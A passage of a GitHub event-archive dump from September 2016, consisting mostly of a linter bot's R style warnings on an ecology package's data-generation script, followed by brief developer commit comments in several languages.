around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:38:47:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L38) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  } else {\n^\n```\n[R/generateArtificialData.R:39:12:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L39) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities) {\n           ^\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:40:13:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L40) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == TRUE){\n            ^\n```\n[R/generateArtificialData.R:40:31:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L40) *style:* **Put spaces around all infix operators.**\n```r\n​\t  if(mechanism_random == TRUE){\n                             ~^~~\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:29:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for (j in 1:n_traits) {\n^\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for (k in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:24:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L44) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:44:48:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L44) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:46:17:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for (j in 1:n_traits) {\n                ^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:47:19:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L47) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for (k in 1:pool_richness) {\n                  ^\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:48:25:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:48:28:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L48) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:48:31:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:48:36:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:44:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:51:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:52:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * \n^\n```\n[R/generateArtificialData.R:52:31:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L52) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n[R/generateArtificialData.R:52:65:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L52) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                                                               ~^~\n```\n[R/generateArtificialData.R:53:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L53) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                              traits_distances[m, ]))\n^\n```\n[R/generateArtificialData.R:53:30:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L53) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                            ~^~~\n```\n[R/generateArtificialData.R:53:49:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L53) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                                               ~^~\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L54) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:55:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L55) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - \n^\n```\n[R/generateArtificialData.R:55:16:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L55) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(m in 1:pool_richness){\n               ^\n```\n[R/generateArtificialData.R:56:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L56) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       max(trait_distances_onedimen)) + 10 ^ -99\n^\n```\n[R/generateArtificialData.R:56:43:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * \n                                         ~^~~\n```\n[R/generateArtificialData.R:56:71:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L56) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * \n                                                                      ^\n```\n[R/generateArtificialData.R:57:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L57) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:59:27:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L59) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - \n                         ~^~~\n```\n[R/generateArtificialData.R:59:31:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L59) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - \n                              ^\n```\n[R/generateArtificialData.R:59:51:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L59) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - \n                                                  ^\n```\n[R/generateArtificialData.R:60:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L60) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix[i, c(present_species)] <- 1\n^\n```\n[R/generateArtificialData.R:60:63:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       max(trait_distances_onedimen)) + 10 ^ -99\n                                                              ^~\n```\n[R/generateArtificialData.R:61:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L61) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:61:29:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L61) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:62:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L62) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix\n^\n```\n[R/generateArtificialData.R:63:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L63) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) {\n^\n```\n[R/generateArtificialData.R:64:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L64) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  traits_pool_df <-\n^\n```\n[R/generateArtificialData.R:66:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L66) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:67:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L67) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n^\n```\n[R/generateArtificialData.R:67:11:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L67) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) {\n          ^\n```\n[R/generateArtificialData.R:67:58:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L67) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) {\n                                                        ~^~~\n```\n[R/generateArtificialData.R:68:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L68) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) { \n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L69) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix <-\n^\n```\n[R/generateArtificialData.R:71:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L71) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:71:14:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n            ~^~~\n```\n[R/generateArtificialData.R:71:62:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n                                                            ~^~~\n```\n[R/generateArtificialData.R:72:11:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L72) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) { \n          ^\n```\n[R/generateArtificialData.R:72:58:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L72) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) { \n                                                        ~^\n```\n[R/generateArtificialData.R:72:58:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L72) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) { \n                                                         ^\n```\n[R/generateArtificialData.R:73:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L73) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(\n^\n```\n[R/generateArtificialData.R:74:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L74) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                      cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^\n```\n[R/generateArtificialData.R:75:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L75) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n^\n```\n[R/generateArtificialData.R:77:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L77) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tplots <- as.data.frame(matrix(\n^\n```\n[R/generateArtificialData.R:77:26:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(\n                        ~^~~\n```\n[R/generateArtificialData.R:78:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L78) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t            as.numeric(as.matrix(comm_spec_matrix[,-ncol(comm_spec_matrix)])),\n^\n```\n[R/generateArtificialData.R:79:33:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n                               ~^~~\n```\n[R/generateArtificialData.R:81:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L81) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n^\n```\n[R/generateArtificialData.R:81:15:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L81) *style:* **Put spaces around all infix operators.**\n```r\n​\tplots <- as.data.frame(matrix(\n             ~^~~\n```\n[R/generateArtificialData.R:83:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L83) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n^\n```\n[R/generateArtificialData.R:84:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L84) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                traits_pool_df[ ,c(2:ncol(traits_pool_df))])\n^\n```\n[R/generateArtificialData.R:85:22:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L85) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n                    ~^~~\n```\n[R/generateArtificialData.R:86:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L86) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n^\n```\n[R/generateArtificialData.R:87:53:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n                                                   ~^~~\n```\n[R/generateArtificialData.R:88:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L88) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:89:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L89) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toutput <- list( traits = traits_pool_df, abundances = plots)\n^\n```\n[R/generateArtificialData.R:90:13:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L90) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n            ^\n```\n[R/generateArtificialData.R:91:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L91) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\treturn(output)\n^\n```\n"}},"created_at":"2016-09-21T14:16:34Z"}
{"id":"4596537607","type":"CommitCommentEvent","actor":{"login":"nanorarias"},"repo":{"name":"Chinipage/tp-algoritmosComplejos"},"payload":{"comment":{"id":19114475,"position":59,"line":59,"path":"src/xqtr/model/Controller.java","commit_id":"6b28854dc1804e9d07b6eec42e8b91436eef0b00","created_at":"2016-09-21T14:17:26Z","updated_at":"2016-09-21T14:17:26Z","body":"A mí en Paradigmas de Programación me enseñaron que no es una buena práctica acceder a las propiedades de una clase desde otra clase (rompés el encapsulamiento). Lo mejor práctica y lo que se suele hacer es hacer propiedades privadas (`private`) o protegidas (`protected`) y acceder a ellas a través de _setters_ y _getters_.\r\n\r\nTengo entendido que Smalltalk (o Pharo, no sé) ni siquiera te deja acceder a propiedades desde otras clases; te obliga a crear los _setters_ y _getters_. Por eso me llamó la atención que vos no los usaras acá."}},"created_at":"2016-09-21T14:17:26Z"}
{"id":"4596541491","type":"CommitCommentEvent","actor":{"login":"pyk"},"repo":{"name":"salestock/fastText.py"},"payload":{"comment":{"id":19114486,"position":null,"line":null,"path":null,"commit_id":"fc1de74812f4cd726ee21d3775c5bd71c402eb9d","created_at":"2016-09-21T14:18:01Z","updated_at":"2016-09-21T14:18:01Z","body":"@elyase feel free to send PR! 😄 "}},"created_at":"2016-09-21T14:18:01Z"}
{"id":"4596544064","type":"CommitCommentEvent","actor":{"login":"gavinking"},"repo":{"name":"ceylon/ceylon-ide-intellij"},"payload":{"comment":{"id":19114498,"position":null,"line":null,"path":null,"commit_id":"7b3c970fc63533f69b395b48fea692ea29942331","created_at":"2016-09-21T14:18:24Z","updated_at":"2016-09-21T14:18:24Z","body":"@bjansen is this *seriously* the right fix!? Shouldn't the called not mutate the resulting `List`?"}},"created_at":"2016-09-21T14:18:24Z"}
{"id":"4596544110","type":"CommitCommentEvent","actor":{"login":"markjcrane"},"repo":{"name":"fusionpbx/fusionpbx"},"payload":{"comment":{"id":19114499,"position":null,"line":null,"path":null,"commit_id":"0f7f2cdc831821ede53140ddce5019cce40bf484","created_at":"2016-09-21T14:18:24Z","updated_at":"2016-09-21T14:18:24Z","body":"When I tried ha monitor based on this script it didn't work for me."}},"created_at":"2016-09-21T14:18:24Z"}
{"id":"4596546415","type":"CommitCommentEvent","actor":{"login":"tonyseek"},"repo":{"name":"YanagiEiichi/apisdk"},"payload":{"comment":{"id":19114506,"position":5,"line":4,"path":"bower.json","commit_id":"061009f432d49024d3d13782dcab20eac2e5dc1c","created_at":"2016-09-21T14:18:45Z","updated_at":"2016-09-21T14:18:45Z","body":"Thanks! 😸 "}},"created_at":"2016-09-21T14:18:45Z"}
{"id":"4596546586","type":"CommitCommentEvent","actor":{"login":"akotwal"},"repo":{"name":"imgd3000team2/game"},"payload":{"comment":{"id":19114507,"position":null,"line":null,"path":null,"commit_id":"e3829ae50806f13d94d07eb1c13d23b02d8307fd","created_at":"2016-09-21T14:18:47Z","updated_at":"2016-09-21T14:18:47Z","body":"Hello"}},"created_at":"2016-09-21T14:18:47Z"}
{"id":"4596553563","type":"CommitCommentEvent","actor":{"login":"uxmal"},"repo":{"name":"uxmal/reko"},"payload":{"comment":{"id":19114524,"position":517,"line":517,"path":"subjects/PE-x86/pySample/pySample.c","commit_id":"e792a89b67ccb3cf04c10e47d3804cf32688fd00","created_at":"2016-09-21T14:19:51Z","updated_at":"2016-09-21T14:19:51Z","body":"Working on it -- real life is interfering right now."}},"created_at":"2016-09-21T14:19:51Z"}
{"id":"4596558859","type":"CommitCommentEvent","actor":{"login":"elyase"},"repo":{"name":"salestock/fastText.py"},"payload":{"comment":{"id":19114542,"position":null,"line":null,"path":null,"commit_id":"fc1de74812f4cd726ee21d3775c5bd71c402eb9d","created_at":"2016-09-21T14:20:38Z","updated_at":"2016-09-21T14:20:38Z","body":"Looking to tackle #77 which is the one I am really interested in. Then this one should come toguether."}},"created_at":"2016-09-21T14:20:38Z"}
{"id":"4596559931","type":"CommitCommentEvent","actor":{"login":"hardingnj"},"repo":{"name":"cggh/biipy"},"payload":{"comment":{"id":19114544,"position":null,"line":null,"path":null,"commit_id":"1e35675881132e58901e971dfa728171fac22e3b","created_at":"2016-09-21T14:20:48Z","updated_at":"2016-09-21T14:20:48Z","body":"Fixes #33 and #32 "}},"created_at":"2016-09-21T14:20:48Z"}
{"id":"4596563289","type":"CommitCommentEvent","actor":{"login":"Eric-Guo"},"repo":{"name":"ruby-china/ruby-china"},"payload":{"comment":{"id":19114556,"position":null,"line":null,"path":null,"commit_id":"e53bd839653a7181ab53539603ad45869f195bb8","created_at":"2016-09-21T14:21:18Z","updated_at":"2016-09-21T14:21:18Z","body":"正常了。current_lock_reply?最后一句的问题。"}},"created_at":"2016-09-21T14:21:18Z"}
{"id":"4596563843","type":"CommitCommentEvent","actor":{"login":"golfromeo-fr"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19114557,"position":null,"line":null,"path":null,"commit_id":"c983744c64dd36390f14d08eb6f0335b50edfaef","created_at":"2016-09-21T14:21:24Z","updated_at":"2016-09-21T14:21:24Z","body":"yes, so the question (Igor,Mikhael): \r\n1/ what is the basic set of options *required* for Armbian boards (build-in+modules)?\r\n2/ the \"often\" requested options by users (so likely to be provided as modules)?\r\n\r\nnote: some required options depends on the hardware features of the board\r\n\r\n3/ so for all the others options => if needed by a user, the Armbian tool exists to compile the kernel\r\n(to paraphase the MasterCard ads: \"for everything else there is Armbian tool\")\r\n\r\nnote: at the end, the less options, the less compilation time for Igor :)"}},"created_at":"2016-09-21T14:21:24Z"}
{"id":"4596566380","type":"CommitCommentEvent","actor":{"login":"errorx666"},"repo":{"name":"yamikuronue/sockmafia-autoGM"},"payload":{"comment":{"id":19114559,"position":null,"line":null,"path":null,"commit_id":"084b5812a6426a8be4f435ed8fcbc36f05f523ba","created_at":"2016-09-21T14:21:45Z","updated_at":"2016-09-21T14:21:45Z","body":":+1:"}},"created_at":"2016-09-21T14:21:45Z"}
{"id":"4596566508","type":"CommitCommentEvent","actor":{"login":"pyk"},"repo":{"name":"salestock/fastText.py"},"payload":{"comment":{"id":19114560,"position":null,"line":null,"path":null,"commit_id":"fc1de74812f4cd726ee21d3775c5bd71c402eb9d","created_at":"2016-09-21T14:21:47Z","updated_at":"2016-09-21T14:21:47Z","body":"Nice! 👍 "}},"created_at":"2016-09-21T14:21:47Z"}
